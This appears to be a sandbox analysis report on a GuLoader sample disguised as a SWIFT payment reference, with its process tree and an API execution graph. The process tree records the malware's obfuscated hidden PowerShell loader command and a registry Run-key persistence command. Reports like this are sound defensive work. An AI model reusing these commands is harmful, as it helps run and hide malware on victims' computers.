                          Commandline:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          Imagebase:0x400000
                          File size:403'933 bytes
                          MD5 hash:724AC474C4FCAA1DF6DA3F9245AC9C85
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:14:36:41
                          Start date:18/03/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
                          Imagebase:0xea0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2601234406.0000000008F67000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:14:36:41
                          Start date:18/03/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:14:36:42
                          Start date:18/03/2024
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe" /c "set /A 1^^0
                          Imagebase:0x240000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:14:37:05
                          Start date:18/03/2024
                          Path:C:\Users\user\AppData\Local\Temp\Vitis.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\Vitis.exe
                          Imagebase:0x400000
                          File size:403'933 bytes
                          MD5 hash:724AC474C4FCAA1DF6DA3F9245AC9C85
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2926040964.00000000018C7000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 58%, ReversingLabs
                          Reputation:low
                          Has exited:false

                          Target ID:8
                          Start time:14:37:11
                          Start date:18/03/2024
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
                          Imagebase:0x240000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:14:37:11
                          Start date:18/03/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:14:37:11
                          Start date:18/03/2024
                          Path:C:\Windows\SysWOW64\reg.exe
                          Wow64 process (32bit):true
                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"
                          Imagebase:0xdc0000
                          File size:59'392 bytes
                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:25.5%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.9%
                            Total number of Nodes:1390
                            Total number of Limit Nodes:45
                            execution_graph 3209 4015c1 3228 402da6 3209->3228 3213 401631 3215 401663 3213->3215 3216 401636 3213->3216 3218 401423 24 API calls 3215->3218 3252 401423 3216->3252 3225 40165b 3218->3225 3223 40164a SetCurrentDirectoryW 3223->3225 3224 4015d1 3224->3213 3226 401617 GetFileAttributesW 3224->3226 3240 405e03 3224->3240 3244 405ad2 3224->3244 3247 405a38 CreateDirectoryW 3224->3247 3256 405ab5 CreateDirectoryW 3224->3256 3226->3224 3229 402db2 3228->3229 3259 406544 3229->3259 3232 4015c8 3234 405e81 CharNextW CharNextW 3232->3234 3235 405e9e 3234->3235 3238 405eb0 3234->3238 3237 405eab CharNextW 3235->3237 3235->3238 3236 405ed4 3236->3224 3237->3236 3238->3236 3239 405e03 CharNextW 3238->3239 3239->3238 3241 405e09 3240->3241 3242 405e1f 3241->3242 3243 405e10 CharNextW 3241->3243 3242->3224 3243->3241 3297 4068d4 GetModuleHandleA 3244->3297 3248 405a85 3247->3248 3249 405a89 GetLastError 3247->3249 3248->3224 3249->3248 3250 405a98 SetFileSecurityW 3249->3250 3250->3248 3251 405aae GetLastError 3250->3251 3251->3248 3306 405569 3252->3306 3255 406507 lstrcpynW 3255->3223 3257 405ac5 3256->3257 3258 405ac9 GetLastError 3256->3258 3257->3224 3258->3257 3260 406551 3259->3260 3261 406774 3260->3261 3264 406742 lstrlenW 3260->3264 3265 406659 GetSystemDirectoryW 3260->3265 3269 406544 10 API calls 3260->3269 3270 40666c GetWindowsDirectoryW 3260->3270 3271 4066e3 lstrcatW 3260->3271 3272 406544 10 API calls 3260->3272 3273 40678e 5 API calls 3260->3273 3274 40669b SHGetSpecialFolderLocation 3260->3274 3285 4063d5 3260->3285 3290 40644e wsprintfW 3260->3290 3291 406507 lstrcpynW 3260->3291 3262 402dd3 3261->3262 3292 406507 lstrcpynW 3261->3292 3262->3232 3276 40678e 3262->3276 3264->3260 3265->3260 3269->3264 3270->3260 3271->3260 3272->3260 3273->3260 3274->3260 3275 4066b3 SHGetPathFromIDListW CoTaskMemFree 3274->3275 3275->3260 3277 40679b 3276->3277 3279 406804 CharNextW 3277->3279 3280 406811 3277->3280 3282 405e03 CharNextW 3277->3282 3283 4067f0 CharNextW 3277->3283 3284 4067ff CharNextW 3277->3284 3278 406816 CharPrevW 3278->3280 3279->3277 3279->3280 3280->3278 3281 406837 3280->3281 3281->3232 3282->3277 3283->3277 3284->3279 3293 406374 3285->3293 3288 406439 3288->3260 3289 406409 RegQueryValueExW RegCloseKey 3289->3288 3290->3260 3291->3260 3292->3262 3294 406383 3293->3294 3295 406387 3294->3295 3296 40638c RegOpenKeyExW 3294->3296 3295->3288 3295->3289 3296->3295 3298 4068f0 3297->3298 3299 4068fa GetProcAddress 3297->3299 3303 406864 GetSystemDirectoryW 3298->3303 3301 405ad9 3299->3301 3301->3224 3302 4068f6 3302->3299 3302->3301 3305 406886 wsprintfW LoadLibraryExW 3303->3305 3305->3302 3307 405584 3306->3307 3308 401431 3306->3308 3309 4055a0 lstrlenW 3307->3309 3310 406544 17 API calls 3307->3310 3308->3255 3311 4055c9 3309->3311 3312 4055ae lstrlenW 3309->3312 3310->3309 3314 4055dc 3311->3314 3315 4055cf SetWindowTextW 3311->3315 3312->3308 3313 4055c0 lstrcatW 3312->3313 3313->3311 3314->3308 3316 4055e2 SendMessageW SendMessageW SendMessageW 3314->3316 3315->3314 3316->3308 3317 401941 3318 401943 3317->3318 3319 402da6 17 API calls 3318->3319 3320 401948 3319->3320 3323 405c13 3320->3323 3362 405ede 3323->3362 3326 405c52 3333 405d72 3326->3333 3376 406507 lstrcpynW 3326->3376 3327 405c3b DeleteFileW 3328 401951 3327->3328 3330 405c78 3331 405c8b 3330->3331 3332 405c7e lstrcatW 3330->3332 3377 405e22 lstrlenW 3331->3377 3334 405c91 3332->3334 3333->3328 3394 40683d FindFirstFileW 3333->3394 3337 405ca1 lstrcatW 3334->3337 3339 405cac lstrlenW FindFirstFileW 3334->3339 3337->3339 3339->3333 3347 405cce 3339->3347 3340 405d9b 3397 405dd6 lstrlenW CharPrevW 3340->3397 3344 405d55 FindNextFileW 3344->3347 3348 405d6b FindClose 3344->3348 3345 405bcb 5 API calls 3346 405dad 3345->3346 3349 405db1 3346->3349 3350 405dc7 3346->3350 3347->3344 3358 405d16 3347->3358 3381 406507 lstrcpynW 3347->3381 3348->3333 3349->3328 3353 405569 24 API calls 3349->3353 3352 405569 24 API calls 3350->3352 3352->3328 3355 405dbe 3353->3355 3354 405c13 60 API calls 3354->3358 3357 4062c7 36 API calls 3355->3357 3356 405569 24 API calls 3356->3344 3359 405dc5 3357->3359 3358->3344 3358->3354 3358->3356 3360 405569 24 API calls 3358->3360 3382 405bcb 3358->3382 3390 4062c7 MoveFileExW 3358->3390 3359->3328 3360->3358 3400 406507 lstrcpynW 3362->3400 3364 405eef 3365 405e81 4 API calls 3364->3365 3366 405ef5 3365->3366 3367 405c33 3366->3367 3368 40678e 5 API calls 3366->3368 3367->3326 3367->3327 3374 405f05 3368->3374 3369 405f36 lstrlenW 3370 405f41 3369->3370 3369->3374 3372 405dd6 3 API calls 3370->3372 3371 40683d 2 API calls 3371->3374 3373 405f46 GetFileAttributesW 3372->3373 3373->3367 3374->3367 3374->3369 3374->3371 3375 405e22 2 API calls 3374->3375 3375->3369 3376->3330 3378 405e30 3377->3378 3379 405e42 3378->3379 3380 405e36 CharPrevW 3378->3380 3379->3334 3380->3378 3380->3379 3381->3347 3401 405fd2 GetFileAttributesW 3382->3401 3385 405be6 RemoveDirectoryW 3387 405bf4 3385->3387 3386 405bee DeleteFileW 3386->3387 3388 405bf8 3387->3388 3389 405c04 SetFileAttributesW 3387->3389 3388->3358 3389->3388 3391 4062e8 3390->3391 3392 4062db 3390->3392 3391->3358 3404 40614d 3392->3404 3395 406853 FindClose 3394->3395 3396 405d97 3394->3396 3395->3396 3396->3328 3396->3340 3398 405df2 lstrcatW 3397->3398 3399 405da1 3397->3399 3398->3399 3399->3345 3400->3364 3402 405bd7 3401->3402 3403 405fe4 SetFileAttributesW 3401->3403 3402->3385 3402->3386 3402->3388 3403->3402 3405 4061a3 GetShortPathNameW 3404->3405 3406 40617d 3404->3406 3408 4062c2 3405->3408 3409 4061b8 3405->3409 3431 405ff7 GetFileAttributesW CreateFileW 3406->3431 3408->3391 3409->3408 3411 4061c0 wsprintfA 3409->3411 3410 406187 CloseHandle GetShortPathNameW 3410->3408 3412 40619b 3410->3412 3413 406544 17 API calls 3411->3413 3412->3405 3412->3408 3414 4061e8 3413->3414 3432 405ff7 GetFileAttributesW CreateFileW 3414->3432 3416 4061f5 3416->3408 3417 406204 GetFileSize GlobalAlloc 3416->3417 3418 406226 3417->3418 3419 4062bb CloseHandle 3417->3419 3433 40607a ReadFile 3418->3433 3419->3408 3424 406245 lstrcpyA 3429 406267 3424->3429 3425 406259 3426 405f5c 4 API calls 3425->3426 3426->3429 3427 40629e SetFilePointer 3440 4060a9 WriteFile 3427->3440 3429->3427 3431->3410 3432->3416 3434 406098 3433->3434 3434->3419 3435 405f5c lstrlenA 3434->3435 3436 405f9d lstrlenA 3435->3436 3437 405fa5 3436->3437 3438 405f76 lstrcmpiA 3436->3438 3437->3424 3437->3425 3438->3437 3439 405f94 CharNextA 3438->3439 3439->3436 3441 4060c7 GlobalFree 3440->3441 3441->3419 3442 401c43 3464 402d84 3442->3464 3444 401c4a 3445 402d84 17 API calls 3444->3445 3446 401c57 3445->3446 3447 401c6c 3446->3447 3448 402da6 17 API calls 3446->3448 3449 401c7c 3447->3449 3450 402da6 17 API calls 3447->3450 3448->3447 3451 401cd3 3449->3451 3452 401c87 3449->3452 3450->3449 3454 402da6 17 API calls 3451->3454 3453 402d84 17 API calls 3452->3453 3456 401c8c 3453->3456 3455 401cd8 3454->3455 3457 402da6 17 API calls 3455->3457 3458 402d84 17 API calls 3456->3458 3459 401ce1 FindWindowExW 3457->3459 3460 401c98 3458->3460 3463 401d03 3459->3463 3461 401cc3 SendMessageW 3460->3461 3462 401ca5 SendMessageTimeoutW 3460->3462 3461->3463 3462->3463 3465 406544 17 API calls 3464->3465 3466 402d99 3465->3466 3466->3444 4186 4028c4 4187 4028ca 4186->4187 4188 4028d2 FindClose 4187->4188 4189 402c2a 4187->4189 4188->4189 3527 4014cb 3528 405569 24 API calls 3527->3528 3529 4014d2 3528->3529 4197 4016cc 4198 402da6 17 API calls 4197->4198 4199 4016d2 GetFullPathNameW 4198->4199 4200 4016ec 4199->4200 4206 40170e 4199->4206 4202 40683d 2 API calls 4200->4202 4200->4206 4201 401723 GetShortPathNameW 4203 402c2a 4201->4203 4204 4016fe 4202->4204 4204->4206 4207 406507 lstrcpynW 4204->4207 4206->4201 4206->4203 4207->4206 4208 401e4e GetDC 4209 402d84 17 API calls 4208->4209 4210 401e60 GetDeviceCaps MulDiv ReleaseDC 4209->4210 4211 402d84 17 API calls 4210->4211 4212 401e91 4211->4212 4213 406544 17 API calls 4212->4213 4214 401ece CreateFontIndirectW 4213->4214 4215 402638 4214->4215 4216 402950 4217 402da6 17 API calls 4216->4217 4218 40295c 4217->4218 4219 402972 4218->4219 4220 402da6 17 API calls 4218->4220 4221 405fd2 2 API calls 4219->4221 4220->4219 4222 402978 4221->4222 4244 405ff7 GetFileAttributesW CreateFileW 4222->4244 4224 402985 4225 402a3b 4224->4225 4226 4029a0 GlobalAlloc 4224->4226 4227 402a23 4224->4227 4228 402a42 DeleteFileW 4225->4228 4229 402a55 4225->4229 4226->4227 4230 4029b9 4226->4230 4231 4032b4 35 API calls 4227->4231 4228->4229 4245 4034af SetFilePointer 4230->4245 4233 402a30 CloseHandle 4231->4233 4233->4225 4234 4029bf 4235 403499 ReadFile 4234->4235 4236 4029c8 GlobalAlloc 4235->4236 4237 4029d8 4236->4237 4238 402a0c 4236->4238 4240 4032b4 35 API calls 4237->4240 4239 4060a9 WriteFile 4238->4239 4241 402a18 GlobalFree 4239->4241 4243 4029e5 4240->4243 4241->4227 4242 402a03 GlobalFree 4242->4238 4243->4242 4244->4224 4245->4234 4246 404ed0 GetDlgItem GetDlgItem 4247 404f22 7 API calls 4246->4247 4255 405147 4246->4255 4248 404fc9 DeleteObject 4247->4248 4249 404fbc SendMessageW 4247->4249 4250 404fd2 4248->4250 4249->4248 4251 405009 4250->4251 4256 406544 17 API calls 4250->4256 4253 404463 18 API calls 4251->4253 4252 405229 4254 4052d5 4252->4254 4263 405282 SendMessageW 4252->4263 4289 40513a 4252->4289 4257 40501d 4253->4257 4258 4052e7 4254->4258 4259 4052df SendMessageW 4254->4259 4255->4252 4274 4051b6 4255->4274 4300 404e1e SendMessageW 4255->4300 4260 404feb SendMessageW SendMessageW 4256->4260 4262 404463 18 API calls 4257->4262 4266 405300 4258->4266 4267 4052f9 ImageList_Destroy 4258->4267 4275 405310 4258->4275 4259->4258 4260->4250 4280 40502e 4262->4280 4269 405297 SendMessageW 4263->4269 4263->4289 4264 40521b SendMessageW 4264->4252 4265 4044ca 8 API calls 4270 4054d6 4265->4270 4271 405309 GlobalFree 4266->4271 4266->4275 4267->4266 4268 40548a 4276 40549c ShowWindow GetDlgItem ShowWindow 4268->4276 4268->4289 4273 4052aa 4269->4273 4271->4275 4272 405109 GetWindowLongW SetWindowLongW 4277 405122 4272->4277 4284 4052bb SendMessageW 4273->4284 4274->4252 4274->4264 4275->4268 4291 40534b 4275->4291 4305 404e9e 4275->4305 4276->4289 4278 405127 ShowWindow 4277->4278 4279 40513f 4277->4279 4298 404498 SendMessageW 4278->4298 4299 404498 SendMessageW 4279->4299 4280->4272 4283 405081 SendMessageW 4280->4283 4285 405104 4280->4285 4286 4050d3 SendMessageW 4280->4286 4287 4050bf SendMessageW 4280->4287 4283->4280 4284->4254 4285->4272 4285->4277 4286->4280 4287->4280 4289->4265 4290 405455 4292 405460 InvalidateRect 4290->4292 4294 40546c 4290->4294 4293 405379 SendMessageW 4291->4293 4295 40538f 4291->4295 4292->4294 4293->4295 4294->4268 4314 404dd9 4294->4314 4295->4290 4296 405403 SendMessageW SendMessageW 4295->4296 4296->4295 4298->4289 4299->4255 4301 404e41 GetMessagePos ScreenToClient SendMessageW 4300->4301 4302 404e7d SendMessageW 4300->4302 4303 404e75 4301->4303 4304 404e7a 4301->4304 4302->4303 4303->4274 4304->4302 4317 406507 lstrcpynW 4305->4317 4307 404eb1 4318 40644e wsprintfW 4307->4318 4309 404ebb 4310 40140b 2 API calls 4309->4310 4311 404ec4 4310->4311 4319 406507 lstrcpynW 4311->4319 4313 404ecb 4313->4291 4320 404d10 4314->4320 4316 404dee 4316->4268 4317->4307 4318->4309 4319->4313 4321 404d29 4320->4321 4322 406544 17 API calls 4321->4322 4323 404d8d 4322->4323 4324 406544 17 API calls 4323->4324 4325 404d98 4324->4325 4326 406544 17 API calls 4325->4326 4327 404dae lstrlenW wsprintfW SetDlgItemTextW 4326->4327 4327->4316 4328 4045d3 lstrlenW 4329 4045f2 4328->4329 4330 4045f4 WideCharToMultiByte 4328->4330 4329->4330 4331 404954 4332 404980 4331->4332 4333 404991 4331->4333 4392 405b4b GetDlgItemTextW 4332->4392 4335 40499d GetDlgItem 4333->4335 4341 4049fc 4333->4341 4336 4049b1 4335->4336 4340 4049c5 SetWindowTextW 4336->4340 4344 405e81 4 API calls 4336->4344 4337 404ae0 4390 404c8f 4337->4390 4394 405b4b GetDlgItemTextW 4337->4394 4338 40498b 4339 40678e 5 API calls 4338->4339 4339->4333 4345 404463 18 API calls 4340->4345 4341->4337 4346 406544 17 API calls 4341->4346 4341->4390 4343 4044ca 8 API calls 4348 404ca3 4343->4348 4349 4049bb 4344->4349 4350 4049e1 4345->4350 4351 404a70 SHBrowseForFolderW 4346->4351 4347 404b10 4352 405ede 18 API calls 4347->4352 4349->4340 4356 405dd6 3 API calls 4349->4356 4353 404463 18 API calls 4350->4353 4351->4337 4354 404a88 CoTaskMemFree 4351->4354 4355 404b16 4352->4355 4357 4049ef 4353->4357 4358 405dd6 3 API calls 4354->4358 4395 406507 lstrcpynW 4355->4395 4356->4340 4393 404498 SendMessageW 4357->4393 4360 404a95 4358->4360 4363 404acc SetDlgItemTextW 4360->4363 4367 406544 17 API calls 4360->4367 4362 4049f5 4365 4068d4 5 API calls 4362->4365 4363->4337 4364 404b2d 4366 4068d4 5 API calls 4364->4366 4365->4341 4373 404b34 4366->4373 4368 404ab4 lstrcmpiW 4367->4368 4368->4363 4370 404ac5 lstrcatW 4368->4370 4369 404b75 4396 406507 lstrcpynW 4369->4396 4370->4363 4372 404b7c 4374 405e81 4 API calls 4372->4374 4373->4369 4378 405e22 2 API calls 4373->4378 4379 404bcd 4373->4379 4375 404b82 GetDiskFreeSpaceW 4374->4375 4377 404ba6 MulDiv 4375->4377 4375->4379 4377->4379 4378->4373 4381 404dd9 20 API calls 4379->4381 4389 404c3e 4379->4389 4380 404c61 4397 404485 KiUserCallbackDispatcher 4380->4397 4383 404c2b 4381->4383 4382 40140b 2 API calls 4382->4380 4385 404c40 SetDlgItemTextW 4383->4385 4386 404c30 4383->4386 4385->4389 4387 404d10 20 API calls 4386->4387 4387->4389 4388 404c7d 4388->4390 4398 4048ad 4388->4398 4389->4380 4389->4382 4390->4343 4392->4338 4393->4362 4394->4347 4395->4364 4396->4372 4397->4388 4399 4048c0 SendMessageW 4398->4399 4400 4048bb 4398->4400 4399->4390 4400->4399 4401 401956 4402 402da6 17 API calls 4401->4402 4403 40195d lstrlenW 4402->4403 4404 402638 4403->4404 4405 4014d7 4406 402d84 17 API calls 4405->4406 4407 4014dd Sleep 4406->4407 4409 402c2a 4407->4409 3540 4020d8 3541 40219c 3540->3541 3542 4020ea 3540->3542 3544 401423 24 API calls 3541->3544 3543 402da6 17 API calls 3542->3543 3545 4020f1 3543->3545 3551 4022f6 3544->3551 3546 402da6 17 API calls 3545->3546 3547 4020fa 3546->3547 3548 402110 LoadLibraryExW 3547->3548 3549 402102 GetModuleHandleW 3547->3549 3548->3541 3550 402121 3548->3550 3549->3548 3549->3550 3560 406943 3550->3560 3554 402132 3557 401423 24 API calls 3554->3557 3558 402142 3554->3558 3555 40216b 3556 405569 24 API calls 3555->3556 3556->3558 3557->3558 3558->3551 3559 40218e FreeLibrary 3558->3559 3559->3551 3565 406529 WideCharToMultiByte 3560->3565 3562 406960 3563 406967 GetProcAddress 3562->3563 3564 40212c 3562->3564 3563->3564 3564->3554 3564->3555 3565->3562 4410 402b59 4411 402b60 4410->4411 4412 402bab 4410->4412 4415 402d84 17 API calls 4411->4415 4418 402ba9 4411->4418 4413 4068d4 5 API calls 4412->4413 4414 402bb2 4413->4414 4416 402da6 17 API calls 4414->4416 4417 402b6e 4415->4417 4419 402bbb 4416->4419 4420 402d84 17 API calls 4417->4420 4419->4418 4421 402bbf IIDFromString 4419->4421 4423 402b7a 4420->4423 4421->4418 4422 402bce 4421->4422 4422->4418 4428 406507 lstrcpynW 4422->4428 4427 40644e wsprintfW 4423->4427 4425 402beb CoTaskMemFree 4425->4418 4427->4418 4428->4425 4429 402a5b 4430 402d84 17 API calls 4429->4430 4431 402a61 4430->4431 4432 402aa4 4431->4432 4433 402a88 4431->4433 4441 40292e 4431->4441 4435 402abe 4432->4435 4436 402aae 4432->4436 4434 402a8d 4433->4434 4437 402a9e 4433->4437 4443 406507 lstrcpynW 4434->4443 4439 406544 17 API calls 4435->4439 4438 402d84 17 API calls 4436->4438 4437->4441 4444 40644e wsprintfW 4437->4444 4438->4437 4439->4437 4443->4441 4444->4441 3566 40175c 3567 402da6 17 API calls 3566->3567 3568 401763 3567->3568 3572 406026 3568->3572 3570 40176a 3571 406026 2 API calls 3570->3571 3571->3570 3573 406033 GetTickCount GetTempFileNameW 3572->3573 3574 40606d 3573->3574 3575 406069 3573->3575 3574->3570 3575->3573 3575->3574 4445 401d5d 4446 402d84 17 API calls 4445->4446 4447 401d6e SetWindowLongW 4446->4447 4448 402c2a 4447->4448 4449 4054dd 4450 405501 4449->4450 4451 4054ed 4449->4451 4454 405509 IsWindowVisible 4450->4454 4460 405520 4450->4460 4452 4054f3 4451->4452 4453 40554a 4451->4453 4455 4044af SendMessageW 4452->4455 4457 40554f CallWindowProcW 4453->4457 4454->4453 4456 405516 4454->4456 4458 4054fd 4455->4458 4459 404e1e 5 API calls 4456->4459 4457->4458 4459->4460 4460->4457 4461 404e9e 4 API calls 4460->4461 4461->4453 3576 401ede 3577 402d84 17 API calls 3576->3577 3578 401ee4 3577->3578 3579 402d84 17 API calls 3578->3579 3580 401ef0 3579->3580 3581 401f07 EnableWindow 3580->3581 3582 401efc ShowWindow 3580->3582 3583 402c2a 3581->3583 3582->3583 4462 4028de 4463 4028e6 4462->4463 4464 4028ea FindNextFileW 4463->4464 4465 4028fc 4463->4465 4464->4465 4466 402943 4464->4466 4468 406507 lstrcpynW 4466->4468 4468->4465 4476 401563 4477 402ba4 4476->4477 4480 40644e wsprintfW 4477->4480 4479 402ba9 4480->4479 3603 403f64 3604 403f7c 3603->3604 3605 4040dd 3603->3605 3604->3605 3606 403f88 3604->3606 3607 40412e 3605->3607 3608 4040ee GetDlgItem GetDlgItem 3605->3608 3609 403f93 SetWindowPos 3606->3609 3610 403fa6 3606->3610 3612 404188 3607->3612 3623 401389 2 API calls 3607->3623 3611 404463 18 API calls 3608->3611 3609->3610 3614 403ff1 3610->3614 3615 403faf ShowWindow 3610->3615 3616 404118 SetClassLongW 3611->3616 3617 4040d8 3612->3617 3676 4044af 3612->3676 3620 404010 3614->3620 3621 403ff9 DestroyWindow 3614->3621 3618 4040ca 3615->3618 3619 403fcf GetWindowLongW 3615->3619 3622 40140b 2 API calls 3616->3622 3698 4044ca 3618->3698 3619->3618 3626 403fe8 ShowWindow 3619->3626 3627 404015 SetWindowLongW 3620->3627 3628 404026 3620->3628 3675 4043ec 3621->3675 3622->3607 3624 404160 3623->3624 3624->3612 3629 404164 SendMessageW 3624->3629 3626->3614 3627->3617 3628->3618 3632 404032 GetDlgItem 3628->3632 3629->3617 3630 40140b 2 API calls 3645 40419a 3630->3645 3631 4043ee DestroyWindow EndDialog 3631->3675 3634 404060 3632->3634 3635 404043 SendMessageW IsWindowEnabled 3632->3635 3633 40441d ShowWindow 3633->3617 3637 40406d 3634->3637 3638 4040b4 SendMessageW 3634->3638 3639 404080 3634->3639 3649 404065 3634->3649 3635->3617 3635->3634 3636 406544 17 API calls 3636->3645 3637->3638 3637->3649 3638->3618 3642 404088 3639->3642 3643 40409d 3639->3643 3641 404463 18 API calls 3641->3645 3692 40140b 3642->3692 3647 40140b 2 API calls 3643->3647 3644 40409b 3644->3618 3645->3617 3645->3630 3645->3631 3645->3636 3645->3641 3666 40432e DestroyWindow 3645->3666 3679 404463 3645->3679 3648 4040a4 3647->3648 3648->3618 3648->3649 3695 40443c 3649->3695 3651 404215 GetDlgItem 3652 404232 ShowWindow KiUserCallbackDispatcher 3651->3652 3653 40422a 3651->3653 3682 404485 KiUserCallbackDispatcher 3652->3682 3653->3652 3655 40425c EnableWindow 3660 404270 3655->3660 3656 404275 GetSystemMenu EnableMenuItem SendMessageW 3657 4042a5 SendMessageW 3656->3657 3656->3660 3657->3660 3660->3656 3683 404498 SendMessageW 3660->3683 3684 403f45 3660->3684 3687 406507 lstrcpynW 3660->3687 3662 4042d4 lstrlenW 3663 406544 17 API calls 3662->3663 3664 4042ea SetWindowTextW 3663->3664 3688 401389 3664->3688 3667 404348 CreateDialogParamW 3666->3667 3666->3675 3668 40437b 3667->3668 3667->3675 3669 404463 18 API calls 3668->3669 3670 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3669->3670 3671 401389 2 API calls 3670->3671 3672 4043cc 3671->3672 3672->3617 3673 4043d4 ShowWindow 3672->3673 3674 4044af SendMessageW 3673->3674 3674->3675 3675->3617 3675->3633 3677 4044c7 3676->3677 3678 4044b8 SendMessageW 3676->3678 3677->3645 3678->3677 3680 406544 17 API calls 3679->3680 3681 40446e SetDlgItemTextW 3680->3681 3681->3651 3682->3655 3683->3660 3685 406544 17 API calls 3684->3685 3686 403f53 SetWindowTextW 3685->3686 3686->3660 3687->3662 3690 401390 3688->3690 3689 4013fe 3689->3645 3690->3689 3691 4013cb MulDiv SendMessageW 3690->3691 3691->3690 3693 401389 2 API calls 3692->3693 3694 401420 3693->3694 3694->3649 3696 404443 3695->3696 3697 404449 SendMessageW 3695->3697 3696->3697 3697->3644 3699 4044e2 GetWindowLongW 3698->3699 3700 40458d 3698->3700 3699->3700 3701 4044f7 3699->3701 3700->3617 3701->3700 3702 404524 GetSysColor 3701->3702 3703 404527 3701->3703 3702->3703 3704 404537 SetBkMode 3703->3704 3705 40452d SetTextColor 3703->3705 3706 404555 3704->3706 3707 40454f GetSysColor 3704->3707 3705->3704 3708 404566 3706->3708 3709 40455c SetBkColor 3706->3709 3707->3706 3708->3700 3710 404580 CreateBrushIndirect 3708->3710 3711 404579 DeleteObject 3708->3711 3709->3708 3710->3700 3711->3710 4481 401968 4482 402d84 17 API calls 4481->4482 4483 40196f 4482->4483 4484 402d84 17 API calls 4483->4484 4485 40197c 4484->4485 4486 402da6 17 API calls 4485->4486 4487 401993 lstrlenW 4486->4487 4488 4019a4 4487->4488 4489 4019e5 4488->4489 4493 406507 lstrcpynW 4488->4493 4491 4019d5 4491->4489 4492 4019da lstrlenW 4491->4492 4492->4489 4493->4491 4494 40166a 4495 402da6 17 API calls 4494->4495 4496 401670 4495->4496 4497 40683d 2 API calls 4496->4497 4498 401676 4497->4498 4499 402aeb 4500 402d84 17 API calls 4499->4500 4501 402af1 4500->4501 4502 406544 17 API calls 4501->4502 4503 40292e 4501->4503 4502->4503 4504 4026ec 4505 402d84 17 API calls 4504->4505 4506 4026fb 4505->4506 4507 402745 ReadFile 4506->4507 4508 40607a ReadFile 4506->4508 4509 402785 MultiByteToWideChar 4506->4509 4510 40283a 4506->4510 4513 4027ab SetFilePointer MultiByteToWideChar 4506->4513 4514 40284b 4506->4514 4516 402838 4506->4516 4517 4060d8 SetFilePointer 4506->4517 4507->4506 4507->4516 4508->4506 4509->4506 4526 40644e wsprintfW 4510->4526 4513->4506 4515 40286c SetFilePointer 4514->4515 4514->4516 4515->4516 4518 4060f4 4517->4518 4519 40610c 4517->4519 4520 40607a ReadFile 4518->4520 4519->4506 4521 406100 4520->4521 4521->4519 4522 406115 SetFilePointer 4521->4522 4523 40613d SetFilePointer 4521->4523 4522->4523 4524 406120 4522->4524 4523->4519 4525 4060a9 WriteFile 4524->4525 4525->4519 4526->4516 3824 40176f 3825 402da6 17 API calls 3824->3825 3826 401776 3825->3826 3827 401796 3826->3827 3828 40179e 3826->3828 3864 406507 lstrcpynW 3827->3864 3865 406507 lstrcpynW 3828->3865 3831 40179c 3835 40678e 5 API calls 